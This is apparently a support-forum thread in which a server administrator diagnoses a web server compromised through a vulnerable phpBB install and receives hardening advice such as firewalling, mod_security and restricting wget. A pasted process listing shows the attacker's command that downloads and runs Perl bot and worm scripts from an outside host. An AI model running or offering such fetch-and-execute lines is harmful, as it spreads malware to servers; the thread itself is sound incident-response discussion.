Urgent, please help or advises me

Hello,

since this morning, I have a huge pbm with the interworx-cp httpd server.

There is an other httpd running named hsphere. [SIZE=2]I didn’t install this at all.[/SIZE]

When I stop my httpd services and kill all /hsphere/…/httpd jobs then restart the httpd service, the hpshere httpd server is coming back. Is it a hack ?

18837 ? S 0:00 /usr/sbin/httpd -DSSL
18840 ? S 0:00 _ /usr/sbin/httpd -DSSL
18865 ? Z 0:00 | _ [sh <defunct>]
18841 ? S 0:01 _ /usr/sbin/httpd -DSSL
18842 ? S 0:00 _ /usr/sbin/httpd -DSSL
18843 ? S 0:00 _ /usr/sbin/httpd -DSSL
18844 ? S 0:00 _ /usr/sbin/httpd -DSSL
19490 ? Z 0:00 | _ [sh <defunct>]
18846 ? S 0:00 _ /usr/sbin/httpd -DSSL
19482 ? Z 0:00 | _ [sh <defunct>]
18848 ? S 0:02 _ /usr/sbin/httpd -DSSL
18849 ? S 0:00 _ /usr/sbin/httpd -DSSL
18850 ? S 0:00 _ /usr/sbin/httpd -DSSL
18851 ? S 0:00 _ /usr/sbin/httpd -DSSL
18874 ? S 0:01 _ /usr/sbin/httpd -DSSL
18875 ? S 0:00 _ /usr/sbin/httpd -DSSL
18869 ? R 0:47 /hsphere/shared/apache/bin/httpd -DSSL
18872 ? S 0:00 /usr/bin/httpd -DSSL
19486 ? R 0:50 /hsphere/shared/apache/bin/httpd -DSSL
19489 ? S 0:00 /usr/bin/httpd -DSSL
19501 ? S 0:00 /hsphere/shared/apache/bin/httpd -DSSL
19504 ? S 0:00 /usr/bin/httpd -DSSL

the [sh <defunct>] seems to be a perl pgm. I have a huge perl pgms running in top.

I have updated my databases updatedb and tried to locate hsphere (locate hsphere) but I didn’"t find it :\

Do you know a tools to check if some files have changed ? has been corrupted or … to check if I’ve been hack.

The pbm now is that I had to stop my httpd services because as soon as I start it all the perl pgm and hsphere httpd restart. My loadaverage then goes up to 50.

Advises ? solutions ?

Thanks
Pascal

More …

I’ve ran hkhunter and chkrootkit but nothing.

But I’ve seen this when I’ve tried to restart the httpd service :

17666 ? S 0:00 _ /usr/sbin/httpd -DSSL
17669 ? S 0:00 _ sh -c cd /tmp;wget www.tenhaseusite.com/bot.txt;perl bot.txt;wget www.tenhaseusite.com/wor
17676 ? R 0:00 _ perl worm.txt

How to protect the httpd server against this

Thanks

Check your /tmp and should will probably find worm.txt and bot.txt files. The attacker most likely go in through the recent phpBB vulnerabilities and used them to download / execute the bot. The script runs with the /hsphere path on purpose to throw off investigations.

How to protect? use a firewall to block unused ports (the script uses 6667 to communicate), install mod_security to filter out “bad” URLs as you find them, chmod wget 700 as the script uses wget to get the file and finally UPDATE PHPBB! :slight_smile:

You won’t find anything via rkhunter or chkrootkit as this isn’t a rootkit or even a root exploit.

Chris

Thanks Chris,

You right I found a ton of files bot.txt and worm.txt
I’ve deletd them.

But I do not understand as I already use a firewall and block the port 6667 .
In fact I block every port not known for IN but allow all port for OUT

It should come from the port 80 (I allow it) but out with any port.

Ok for the wget.

For phpBB my version is up to date, but maybe not one of my customer.

For the mod_security do you have an rpm archive ?

Thanks for your help Chris

Pascal

[QUOTE=pascal]

But I do not understand as I already use a firewall and block the port 6667 .
In fact I block every port not known for IN but allow all port for OUT

Actually it looks like “bot” listens on the first port it can and “worm” connects go google to search for and infect more servers.

For phpBB my version is up to date, but maybe not one of my customer.

indeed, we saw the same thing with one of our clients this morning as well. It was actually a phpBB phpNuke mod.

For the mod_security do you have an rpm archive ?

http://updates.interworx.info/iworx/RPMS/nexcess/cos3x/i386/mod_security-1.8.4-1.iworx.i386.rpm

USE THE ABOVE AT YOUR OWN RISK. IT IS UNSUPPORTED

Chris

Thanks chris for everything.

USE THE ABOVE AT YOUR OWN RISK. IT IS UNSUPPORTED

Ok but do you know bad impact on a interworx-cp ?

Pascal

Thanks Chris.

Since I’ve put the chmod 700 on wget everything seems to be OK.

I’ll look for a tutorial for mod_security to install it. Indeed, I do not know it and never install it.

Thanks for everything and let me whish you an happy christmas

Pascal

that is a source RPM if I’m not mistaken so it puts the files it extracts in the same place (subdirectory) as your other RedHat (or CentOS or whatever you are runnung) sources. Can’t remember right now. You then need to compile it.

Chris, where is wget to chmod it (in a bin directory somewhere I assume)?

To both of you (and anyone else reading) I hope you had a great Chrismas and have a happy new year!

Actually, that’s a link to the CentOS bin rpm (which I think Pascal uses). The SRPM is here: http://updates.interworx.info/iworx/SRPMS/nexcess/mod_security-1.8.4-1.iworx.src.rpm

It’s in /usr/bin Tim:


[root@storage1 storoot]# which wget
/usr/bin/wget

Merry x-mas to all as well :slight_smile:

Chris

I must have really been tired not to have seen that.

[/quote]

It’s in /usr/bin Tim:


[root@storage1 storoot]# which wget
/usr/bin/wget

[/quote]

Thanks, I’m, gonna do that now.

BTW, is this the same one that got me before or something else?

Merry x-mas to all as well :slight_smile:

Chris

Thanks Chris.

Tim

Hello,

is somebody has a good HOWTO or tuto about mod_security ?

Thanks
Pascal